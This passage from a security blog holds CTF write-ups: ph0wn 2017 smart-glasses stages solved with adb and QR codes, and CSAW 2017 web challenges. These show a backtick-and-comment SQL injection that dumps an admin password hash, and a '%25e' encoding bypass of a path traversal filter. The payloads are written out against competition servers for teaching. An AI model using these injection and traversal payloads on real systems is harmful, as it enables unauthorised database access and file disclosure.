style="box-sizing: border-box;">'</span>0x<span class="pl-pds" style="box-sizing: border-box;">'</span></span>,<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span><span class="pl-pds" style="box-sizing: border-box;">'</span></span>))[:<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span><span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">1</span>].decode(<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>he<span class="pl-ii" style="background-color: #b31d28; box-sizing: border-box; color: #fafbfc;"></span></span>
<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">...</span>: x<span class="pl-s" style="box-sizing: border-box; color: #477bf7;"><span class="pl-pds" style="box-sizing: border-box;">'</span>))<span class="pl-ii" style="background-color: #b31d28; box-sizing: border-box; color: #fafbfc;"></span></span>
Congratulations, this <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span> stage <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">2</span> !
To flag this stage, flag <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span>: Ph0wn{KKKPicoIsEverywhere} where you must replace <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">KKK</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">with</span> the key you found during stage <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">1</span>.
Key <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">for</span> stage <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">3</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span>: c_Hqopef91
Stage <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">3</span>:
Search <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">in</span> the room, direction <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">NW</span>, <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">for</span> a hidden treasure :) Be quiet so that other teams do <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">not</span> understand what you are doing.
To flag this stage, flag <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">format</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span>: Ph0wn{<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">KKKKKKKKKKAAABBBCCCDDDEEEFFFGGG</span>}.
Where <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">KKKKKKKKKK</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span> the key you found during stage <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">1</span>.
<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">AAA</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span> the coordinates of the first lettter of word <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">FORTINET</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span> the treasure. First letter <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span> column (A, B, C<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">...</span>). Second letter <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span> row (<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">1</span>,<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">2</span>,<span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">3</span><span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">...</span>). Third letter <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span> word direction: H <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">for</span> horizontal, V <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">for</span> vertical. So, <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">if</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">FORTINET</span> starts at row A, column <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">3</span>, horizontally, we will have <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">A3H</span>.
<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">BBB</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">is</span> the coordinates <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">for</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">TELECOM</span>,
<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">CCC</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">for</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">PARISTECH</span>,
<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">DDD</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">for</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">PLATEFORME</span>,
<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">EEE</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">for</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">CONCEPTION</span>,
<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">FFF</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">for</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">EURECOM</span>
<span class="pl-k" style="box-sizing: border-box; color: #d73a49;">-</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">and</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">GGG</span> <span class="pl-k" style="box-sizing: border-box; color: #d73a49;">for</span> <span class="pl-c1" style="box-sizing: border-box; color: #005cc5;">GREHACK</span>.
Good luck.</pre>
</div>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
BINGO!! All the information of flags for Stage 2 and Stage 3 are revealed!</div>
<ol start="5" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;"><div style="box-sizing: border-box; margin-bottom: 16px; margin-top: 16px;">
The rest are simple (we hoped :) ), it actually require some physical <em style="box-sizing: border-box;">exercises</em> and playing with some word game (as described above), no computer skills needed. (But personally I think this kind of thing made this challenge a lot of fun and unlike any other CTF challenges before. Plus 1 for ph0wn organizers!)</div>
</li>
<li style="box-sizing: border-box; margin-top: 0.25em;"><div style="box-sizing: border-box; margin-bottom: 16px; margin-top: 16px;">
So,to conclude, the flags are as follows:</div>
</li>
</ol>
<ul style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em;">
<li style="box-sizing: border-box;">Stage 2: <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">Ph0wn{X@MPicoIsEverywhere}</code></li>
<li style="box-sizing: border-box; margin-top: 0.25em;">Stage 3: <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">Ph0wn{c_Hqopef91M17HI10VO19VK1VL14VA8VC12V</code></li>
</ul>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px;">
<span style="box-sizing: border-box; font-weight: 600;">BONUS</span> Here is the <em style="box-sizing: border-box;">hidden treasure</em> we found (with some <em style="box-sizing: border-box;">beautiful original handwriting</em>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2u6rLN-cJp03-Ge9K5VTSlj5adKOcOKDtLLPhA7m3cCq1Cpsy9V5VmvTDmKamJ_oSYmGmCLqO4g1q1KnCN-FiHpqD4QZVvMSU1Ixzbl6FVWzGgLgZ1sBvbOi9bpbxWtzFfFUU/s1600/hiddentreasure.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="900" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2u6rLN-cJp03-Ge9K5VTSlj5adKOcOKDtLLPhA7m3cCq1Cpsy9V5VmvTDmKamJ_oSYmGmCLqO4g1q1KnCN-FiHpqD4QZVvMSU1Ixzbl6FVWzGgLgZ1sBvbOi9bpbxWtzFfFUU/s320/hiddentreasure.jpg" width="180" /></a></div>
</div>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px;">
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-51806368242212310172017-12-09T14:30:00.000+01:002017-12-09T15:20:30.423+01:00ph0wn CTF 2017 Write-up: Misc/helpxman - Stage 1<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; white-space: normal;">
When wearing the smart glasses, we can see there is an application called <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">Ph0wn Glasses</code>. Go to that application (by using controller on the glasses, we can see one QR code appears on the screen.</div>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; white-space: normal;">
The QR code is much likely have information about the flag. Let's try to read it!</div>
<ol style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em; white-space: normal;">
<li style="box-sizing: border-box;">Connect the smart glasses with the (ADB already installed) computer.</li>
<li style="box-sizing: border-box; margin-top: 0.25em;">From the command prompt of the computer (<code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">Ctrl+R</code> --> Type <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">cmd</code> --> Press <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">Enter</code>). Type:</li>
</ol>
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">> adb devices
List of devices attached
* daemon not running. starting it now at tcp:5037 *
* daemon started successfully *
IDOFTHEDEVICE device</code></pre>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; white-space: normal;">
=> Make sure the ID of the device appear as above. Otherwise, we have to:</div>
<ul style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em; white-space: normal;">
<li style="box-sizing: border-box;">Turn on <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">Developer options</code> in the Settings of the glasses. (The glasses is running Android, so it's the same as any other Android devices).</li>
<li style="box-sizing: border-box; margin-top: 0.25em;">Restart <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">ADB service</code> on host computer: <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">> adb kill-server</code></li>
<li style="box-sizing: border-box; margin-top: 0.25em;">Try to connect with the device (glasses) again: <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">> adb devices</code></li>
</ul>
<ol start="3" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em; white-space: normal;">
<li style="box-sizing: border-box;"><div style="box-sizing: border-box; margin-bottom: 16px; margin-top: 16px;">
On the smart glasses, browse to the application, so that the QR code image appears on the screen. The idea is we try to take a screenshot of the glasses, pull it to our host computer and read it by QR code reader.</div>
</li>
<li style="box-sizing: border-box; margin-top: 0.25em;"><div style="box-sizing: border-box; margin-bottom: 16px; margin-top: 16px;">
Take a screen shot by <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">adb</code> command:</div>
</li>
</ol>
<pre lang="dos" style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">> adb shell screencap -p /sdcard/screencap.png</code></pre>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; white-space: normal;">
The screenshot will be saved in the glasses' SDcard.</div>
<ol start="5" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em; white-space: normal;">
<li style="box-sizing: border-box;">Pull the file to host computer (current working folder):</li>
</ol>
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">> adb pull /sdcard/screencap.png .</code></pre>
<ol start="6" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em; white-space: normal;">
<li style="box-sizing: border-box;">View the image:</li>
</ol>
<pre style="background-color: #323435; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">> screencap.png</code></pre>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; white-space: normal;">
We will see it on our computer's screen:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipg0NPLeLgUI80jJVROpt-4aAeitvU3xaDIbOAGbSXcKwOpP7muizGEZ_4c0U89sNXT8WS_6H6PiF5xo6i702g9yXZyMKE2bOZiLWe6pzYge2Th6VLiynvdXZx8VJuQkId-Om2/s1600/screencap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="240" data-original-width="428" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipg0NPLeLgUI80jJVROpt-4aAeitvU3xaDIbOAGbSXcKwOpP7muizGEZ_4c0U89sNXT8WS_6H6PiF5xo6i702g9yXZyMKE2bOZiLWe6pzYge2Th6VLiynvdXZx8VJuQkId-Om2/s320/screencap.png" width="320" /></a></div>
</div>
<ol start="7" style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; margin-top: 0px; padding-left: 2em; white-space: normal;">
<li style="box-sizing: border-box;">Now, let's read the QR code. No need to make things complecated, let's choose a very simple way: show the image on computer's creen, read it with the <a href="https://play.google.com/store/apps/details?id=com.google.zxing.client.android&hl=en" rel="nofollow" style="box-sizing: border-box; color: #0366d6; text-decoration-line: none;">Barcode scanner</a> app on our normal phone.</li>
</ol>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; white-space: normal;">
It's quickly be recognized as follows:</div>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; white-space: normal;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtTxLrIJO-AZT7wTEVDdlqU_3gd9rvCdEMxt03-FECnfHYovd6V-1KXC4Khyphenhypheny0C-TiG0K-hJYaE3LlKexzHDkH74Rn-w_DrT0bE0GpCQHR1dpcR6JkG3rasUqsiLKDVHXjWhNy/s1600/Screenshot_20171129-190305.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtTxLrIJO-AZT7wTEVDdlqU_3gd9rvCdEMxt03-FECnfHYovd6V-1KXC4Khyphenhypheny0C-TiG0K-hJYaE3LlKexzHDkH74Rn-w_DrT0bE0GpCQHR1dpcR6JkG3rasUqsiLKDVHXjWhNy/s320/Screenshot_20171129-190305.png" width="320" /></a></div>
</div>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; margin-bottom: 16px; white-space: normal;">
So, the flag is: <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">Ph0wn{ScottWishesHeHadOurSmartGlasses}</code></div>
<div style="box-sizing: border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 16px; white-space: normal;">
And, we note the key <code style="background-color: #5f5858; border-radius: 3px; box-sizing: border-box; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">X@M</code> for the next stage.</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-89430431206129623202017-09-24T18:00:00.005+02:002017-09-24T18:01:48.807+02:00CSAW 2017 CTF Write-up: Web littlequery### Points<br />
200<br />
<br />
### Readme<br />
```<br />
I've got a new website for BIG DATA analytics!<br />
<a href="http://littlequery.chal.csaw.io/">http://littlequery.chal.csaw.io</a><br />
```<br />
<br />
### Steps<br />
<br />
0. The website has nothing than one login page. When trying to login with some dummy data like test/test; we noticed that the password field is somehow modified before the data is submitted to server.<br />
<br />
Open the source of the page, we find that there is one javascript file at `js/login.js` that is used to handle the form data.<br />
<br />
Open the javascript file, it contains only one function:<br />
<br />
```<br />
$(".form-signin").submit(function () {<br />
var $password = $(this).find("input[type=password]");<br />
$password.val(CryptoJS.SHA1($password.val()).toString());<br />
});<br />
```<br />
<br />
So, we know that the input password is actually be hashed to SHA1 format before submitting (and probably saved in the same format) to server.<br />
<br />
We then come up with the idea, if we can know the username and hashed password, we can use that directly to login to the website without the need of finding original unhashed password. (That can be achieved pretty easily by disabling javascript in login page).<br />
<br />
1. A quick scanning with the provided link (by some tools such as `OWASP ZAP`) result in finding a hidden file. The file is called `db_explore.php` located inside a sub-directory `api`.<br />
<br />
2. Check the file:<br />
<br />
<a href="http://littlequery.chal.csaw.io/api/db_explore.php">http://littlequery.chal.csaw.io/api/db_explore.php</a><br />
<br />
Resulted in:<br />
```<br />
Must specify mode={schema|preview}<br />
```<br />
<br />
3. Let's add one parameter `mode=schema` as it suggested.<br />
<br />
<a href="http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema">http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema</a><br />
<br />
Resulted in:<br />
<br />
```<br />
{"dbs":["littlequery"]}<br />
```<br />
<br />
Looks like we have seen the database name, and it is: `littlequery`<br />
<br />
4. What if we add one more param, such as `db=littlequery` to see if it can show us the schema of the database?<br />
<br />
<a href="http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery">http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery</a><br />
<br />
Resulted in:<br />
```<br />
{"tables":["user"]}<br />
```<br />
<br />
Exactly as we thought. It showed us that the database has one table named `user`.<br />
<br />
5. We think inside this `user` table, there must be some columns related to `username` and `password`, let's verify that:<br />
<br />
<a href="http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery&table=user">http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery&table=user</a><br />
<br />
Resulted in:<br />
<br />
```<br />
{"columns":{"uid":"int(11)","username":"varchar(128)","password":"varchar(40)"}}<br />
```<br />
<br />
Exactly! The table has two columns, one is `username` (maximum length is 128 chars) and the other is `password` (with the maximum length is 40 characters for each value). It seems to be pretty matched with our assumption at the beginning.<br />
<br />
6. Now, if we could see the detail content of this table, we can know that username and password in order to login to the site, then our mission will be done!<br />
<br />
We also remember that there is one more `mode` to use is `preview`. Let's use it to see it can help us to see the content of the table:<br />
<br />
<a href="http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery&table=user">http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery&table=user</a><br />
<br />
Resulted in:<br />
<br />
```<br />
Database 'littlequery' is not allowed to be previewed.<br />
```<br />
<br />
What?! How could it be?? We cannot see the content of the database because it is not allowed to do so.<br />
<br />
7. We try to change the database name to see what would happen:<br />
<br />
<a href="http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=anything&table=user">http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=anything&table=user</a><br />
<br />
Resulted in:<br />
```<br />
`anything`.`user` doesn't exist.<br />
```<br />
<br />
Note that the character "`" is added around the name of the database and the table.<br />
<br />
8. So, we can come up with the followng two ideas:<br />
<br />
* Firstly, there must be a filter of database name inside the PHP source code that blocks us from requesting the `littlequery` db. So, our mission now is: How to cheat the PHP filter function that it thinks we are not requesting the `littlequery` database, but actually the SQL query later on still work as we expected (the table `user` inside `littlequery` database is still be requested).<br />
<br />
Or, in other words, we should provide one database-name-payload to the `db` param so that it actually request directly to the table inside the database (and not the database itself).<br />
<br />
* Secondly, the character "`" could (hopefully) be used to fool the filter in the PHP code.<br />
<br />
9. We try to append the table name directly to the database name, to see what happen:<br />
<br />
<a href="http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user&table=user">http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user&table=user</a><br />
<br />
(Note that the "`" will be added at the beginning and the end of `db` param value).<br />
<br />
Resulted in:<br />
```<br />
`littlequery`.`user`.`user` doesn't exist.<br />
```<br />
<br />
Almost there. It looks like the `table` param's value is still being taken into account.<br />
<br />
10. Now what we need to do is to put something at the end of database name query so that it ignores everything else come after.<br />
<br />
That something is: two hiphen and one space characters: `-- ` (Characters used for comments in SQL)<br />
<br />
And because the character "`" added by the PHP source code also be ignored, so we have to put it by ourselve.<br />
<br />
So, finally, we have to append the following characters to the `db` param: ``-- `<br />
<br />
12. The final request will be:<br />
<br />
<a href="http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`--%20&table=user" target="_blank">http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`-- &table=user</a><br />
<br />
Or:<br />
<br />
<a href="http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`%2d%2d%20&table=user">http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`%2d%2d%20&table=user</a><br />
<br />
Resulted in:<br />
```<br />
[{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}]<br />
```<br />
<br />
Bingo! Now we can use this username/password to login to the site (with disabled Javascript) at:<br />
<br />
<a href="http://littlequery.chal.csaw.io/login.php">http://littlequery.chal.csaw.io/login.php</a><br />
<br />
13. After logging in, the flag is appeared right away!<br />
```<br />
flag{mayb3_1ts_t1m3_4_real_real_escape_string?}<br />
```<br />
<br />
### NOTE:<br />
The same result can be achieved by using `%23` (`#`) instead of `%2d%2d%20` (`-- `).Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-56557006778843805652017-09-22T23:46:00.002+02:002019-01-13T02:32:21.769+01:00CSAW 2017 CTF Write-up: Web orange v1 <pre style="white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: inherit;">### Points
100
### Readme
```
I wrote a little proxy program in NodeJS for my poems folder.
Everyone wants to read flag.txt but I like it too much to share.
<a href="http://web.chal.csaw.io:7311/?path=orange.txt">http://web.chal.csaw.io:7311/?path=orange.txt</a>
```
### Steps
1. We clicked to the provided link. It show us the content of a normal plain text file.
```
i love oranges
```
2. We can realize that this might be a kind of `Path traversal` attack. So, let's try some possible ways:
* Firstly, we try to see if the `..` is being blocked:
<a href="http://web.chal.csaw.io:7311/?path=../orange.txt">http://web.chal.csaw.io:7311/?path=../orange.txt</a>
Resulted in:
```
WHOA THATS BANNED!!!!
```
So, we know that it filters out and block: `..` characters.
* Secondly, we try with the unicode format of the character `.` as `%25e`:
<a href="http://web.chal.csaw.io:7311/?path=%25e%25e/orange.txt">http://web.chal.csaw.io:7311/?path=%25e%25e/orange.txt</a>
Resulted in:
```
Error response
Error code 404.
Message: File not found.
Error code explanation: 404 = Nothing matches the given URI.
```
Wow, the printed result is different from the previous try. So, we know that the `%25e` character has not been filtered out. Now, it is just the matter of `<b><i>File not found</i></b>`.</span></pre>
